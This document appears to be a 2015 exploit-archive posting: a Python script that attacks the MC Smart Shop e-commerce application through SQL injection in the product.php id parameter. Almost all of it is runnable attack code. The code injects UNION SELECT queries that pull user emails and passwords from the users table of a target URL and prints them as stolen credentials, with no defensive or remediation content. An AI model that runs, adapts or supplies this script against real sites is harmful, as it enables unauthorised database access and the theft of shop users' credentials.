MC Smart Shop <- (product.php id) SQL Injection Exploit

# Discovered by : Semtemb0x
|~App. : MC Smart Shop
|~Vendor Homepage: http://microcode.ws/
|~Official Demo : http://microcode.ws/demo/smartshop/
|~Sales Link: http://codecanyon.net/item/mc-smart-shop/11555914
|~Date : "28.05.2015"
|~Greetz: _UnDeRTaKeR_, BARCOD3, KnocKout / http://milw00rm.com
##############################################################
                              ( http://pastebin.com/exR0cJw2 )
###############################################################
#!/usr/bin/env python

# Exploit Title: MC Smart Shop (product.php id) SQL Injection Exploit
# Date: 28/05/2015
# Exploit Author: Septemb0x
# Vendor Homepage: http://microcode.ws/
# Software Link: http://microcode.ws/demo/smartshop/
# Version: 1.0
# Thanks: _UnDeRTaKeR_, BARCOD3, KnocKout

import sys, urllib2, re, os, time
   
if len(sys.argv) < 2:
    os.system(['clear','cls'][1])
    print " ____________________________________________________________________"
    print "|                                                                    |"
    print "|   MC Smart Shop (product.php id) SQL Injection Exploit             |"
    print "|   Septemb0x / Cyber-Warrior.Org                                    |"
    print "|   exploit.py http://[target]/path/                                 |"
    print "|____________________________________________________________________|"
    sys.exit(1)
  
addhttp = "http://"
addslash = "/"
url = sys.argv[1]

if url[-1:] != addslash:
    url += addslash
      
if url[:7]  != addhttp:
    url =  addhttp + url
  
exploitfile = "product.php"

getusername = "?id=-1%20union%20select%200,email,2,3,4,5,6,7,8,9,10,11,12,13,14,15%20from%20users"
getpassword = "?id=-1%20union%20select%200,password,2,3,4,5,6,7,8,9,10,11,12,13,14,15%20from%20users"

targetu = url + exploitfile + getusername
targetp = url + exploitfile + getpassword



print "\nExploiting...\n"
 
try:
    data = urllib2.urlopen(targetu).read()
    getdata = re.findall(r"<title>(.*)([0-9a-fA-F])(.*)</title>", data)
    if len(getdata) > 0:
        print "UserName:  " + getdata[0][0] + getdata[0][1] +getdata[0][2]
    else:
        print "Exploit failed..."
         
 
except urllib2.HTTPError:
    print "Access Denied!"

    
try:
    data = urllib2.urlopen(targetp).read()
    getdata = re.findall(r"<title>(.*)([0-9a-fA-F])(.*)</title>", data)
    if len(getdata) > 0:
        print "PassWord:  " + getdata[0][0] + getdata[0][1] +getdata[0][2]
                 
        print "\nSuccessful Exploit!"
    else:
        print "Exploit failed..."
         
 
except urllib2.HTTPError:
    print "Access Denied!"